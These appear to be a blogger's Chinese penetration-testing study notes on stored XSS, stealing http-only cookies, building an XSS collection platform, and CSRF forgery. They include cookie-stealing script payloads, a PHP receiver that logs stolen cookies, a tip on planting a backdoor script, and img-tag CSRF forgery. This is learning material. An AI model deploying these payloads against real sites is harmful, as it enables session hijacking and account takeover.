满天星
Fork me on GitHub

渗透测试学习笔记21-xssANDcsrf漏洞

存储型XSS:
必须要写入到数据库中,再调用这个页面
一般在留言板多一些.盲打cookie
</textarea><script>alert(/xss/)</script><textarea>
可能闭合影响后台,不闭合影响前台


http-only
相当于对认证的cookie进行一次加密
留言的话DZ是在发表->下面的抢楼->alert(document.cookie)
弹cookie之后,发现没有auth这个cookie
需要用一个js代码,在http-only实验里面有个o.js和save.php
使用:
1.将"全部去掉 2.将:换成= 3.将,换成; 4.将+换成%2B
<script>alert(document.cookie)</script>
<script src="http://127.0.0.1/o.js"></script>

save.php->(用来接收cookie的)
<?php
$a = $_GET["opener"];
$file = fopen("test_xxx.txt","w+");
echo fwrite($file,$a);
fclose($file);
?>

o.js->(传递cookie)
alert(JSON.stringify(cookie_dict));
    x.src='http://localhost/save.php?opener='+JSON.stringify(cookie_dict);
或者是:
<script>
    var cookie=document.cookie;
    var url="http://127.0.0.1/cookie.php?x=";
    windows.location.href=url+cookie;
</script>


XSS平台搭建:
zkeys包含支持php和mysql
用phpinfo()来确认IIS是否搭建成功
sql要在后台添加进去,config的url指向要写自己的ip
权限->右键->属性->安全->添加->输入e,就添加了Everyone
建立index,注册,然后默认模块->keepsession
搭好后还需要重写一下url
安装ISAPI,然后绿色版直接全部copy到安装目录
打开,XSS站点,然后edit->Apply,就搭成功了.

要用邀请码的,需要把config里的注册配置的normal改成invite
然后再配置UPDATE的adminLevel = "1",在后台里面编辑一个用户改成"1"就行了

这个是单人用的
在文件下载->BlueLotus_XSSReceiver_master.zip解压到网站路径
http://localhost就能找到

留后门就是js写的src指向,最好写在oclick里面

csrf
跨站请求伪造攻击
CSRF(Cross-site request forgery跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,并且攻击方式几乎相左。XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性。

可以通过url来提交的,基本都可能存在csrf

将post改为get提交的办法:
抓包,http://Host+POST+&+底下的cookie
->Drop
取消代理
复制get提交到url,回车,就能创建成功了
然后怎么伪造呢,xx.html,里面是<img src="">

csrf有防护机制的,一般是referer防护的
referer主要是用来判断提交的页面是否合法的
Enable Referer,告诉它是从这个页面跳过来的,然后url+index.php,就能得到返回值了
-------------本文结束期待您的评论-------------